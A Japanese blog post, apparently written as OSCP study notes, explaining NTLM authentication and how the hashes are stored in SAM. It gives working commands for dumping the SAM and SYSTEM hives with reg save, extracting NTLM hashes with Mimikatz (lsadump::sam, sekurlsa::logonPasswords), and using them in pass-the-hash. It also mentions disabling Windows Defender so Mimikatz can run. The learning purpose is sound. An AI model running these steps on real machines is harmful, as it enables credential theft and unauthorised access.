#70 NTLM
年度末ですね。エンジニアとして働きだして、あっという間の2年でした。日々、新しいことにチャレンジし、手を汚して学んできた積み重ねで、今があると思っています。新年度も、泥にまみれて戦います。
さて、OSCPの勉強を進めていて、Windowsの知識が決定的に欠けていると気づきました。Active Directoryのような高度な内容に入る前に、しっかり基礎を固めておきます。Windowsの認証機構であるNTLMについて、まとめました。
NTLMとは
NTLMは、NT Lan Managerの略で、チャレンジ&レスポンス形式の認証プロトコルです。暗号化に古いアルゴリズムを使っているため、利用は非推奨とされていますが、レガシーシステムとの互換性のため、使われることもあります。
認証に使うパスワードをハッシュ化して保存しておき、Windowsにログインする際や、リモートサービス(SMBサーバーなど)と通信をする際に使われます。
SAM
NTLMハッシュは、Security Account Manager(SAM)に暗号化され他状態で保存されています。ファイルとして"C:\Windows\System32\Config\SAM"に存在しますが、内容は簡単には取り出せません。SYSTEM権限で読みだそうとしても、他のプロセスに専有されているため、エラーとなります。
> type C:\Windows\system32\config\SAM
type : The process cannot access the file 'C:\Windows\system32\config\SAM' because it is being used by another process.
At line:1 char:1
+ type C:\Windows\system32\config\SAM
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ReadError: (C:\Windows\system32\config\SAM:String) [Get-Content], IOException
+ FullyQualifiedErrorId : GetContentReaderIOError,Microsoft.PowerShell.Commands.GetContentCommand管理者権限があれば、レジストリからダンプできます。
> reg save hklm\sam c:\sam
The operation completed successfully.SAMは、暗号化されているため、そのままでは内容が確認できません。同じく"C:\Windows\System32\Config"配下にある、SYSTEMファイルにあるSysKeyが暗号化キーとなっています。同様にレジストリからダンプできます。
> reg save hklm\system c:\systemMimikatz
Mimikatzは、Windows向けのツールで、SAMとSYSTEMファイルからNTLMハッシュを復号したり、メモリに読み込まれているNTLMハッシュを読み出したりできます。管理者権限が必要です。
まずは、Mimikatzコンソールを起動し、必要な権限があるか確認します。
> .\mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OKSYSTEMダンプとSAMダンプがある場合は、以下のようにして複合できます。Hash NTLMの部分がNTLMハッシュです。
mimikatz # lsadump::sam /system:C:\system /sam:C:\sam
Domain : DESKTOP-AAAAAAA
SysKey : xxxxxxxxxxxxxxxxxxxxxxxxxx
Local SID : S-1-5-21-413498671-1503835181-406322130
SAMKey : xxxxxxxxxxxxxxxxxxxxxxxxxx
RID : 000001f4 (500)
User : Administrator
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000003e8 (1000)
User : kusa
Hash NTLM: xxxxxxxxxxxxxxxxxxxxxxxxxxメモリから読み出す場合は、以下のようにします。NTLMの箇所がNTLMハッシュです。
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 166347 (00000000:000289cb)
Session : Interactive from 1
User Name : kusa
Domain : DESKTOP-AAAAAAA
Logon Server : DESKTOP-AAAAAAA
Logon Time : 3/26/2023 10:45:01 PM
SID : S-1-5-21-413498671-1503835181-406322130-1000
msv :
[00000003] Primary
* Username : kusa
* Domain : DESKTOP-AAAAAAA
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxx
tspkg :
wdigest :
* Username : kusa
* Domain : DESKTOP-AAAAAAA
* Password : (null)
kerberos :
* Username : kusa
* Domain : DESKTOP-AAAAAAA
* Password : (null)
ssp :
credman :
cloudap :NTLMの脆弱性
NTLMハッシュを取り出せてなにがうれしいか。NTLMプロトコルでは、ハッシュ値さえあれば、パスワードがわからなくても認証が成功します。これはPass-The-Hash攻撃と呼ばれています。その名のとおり、パスワードではなくNTLMハッシュを直接サービスに渡すことで認証をバイパスします。 付け加えると、NTLMハッシュは、パスワードが同じなら同じ値になるので、同一パスワードの別人のアカウントでも認証が成功します。
…なんか危なそうじゃないですか?
もちろん、パスワードクラッカーで平文のパスワードを特定してもOKです。好きにしてください。
まとめ
NTLMを悪用すると、パスワードを知らなくてもネットワーク内を動けてしまいます。ちなみに、Mimikatzは、Windows Defenderで弾かれたので、ウイルスフィルターを一時的に止める必要がありました。他にも同様に攻撃できるツールはいくらでもあります。お気をつけて。
EOF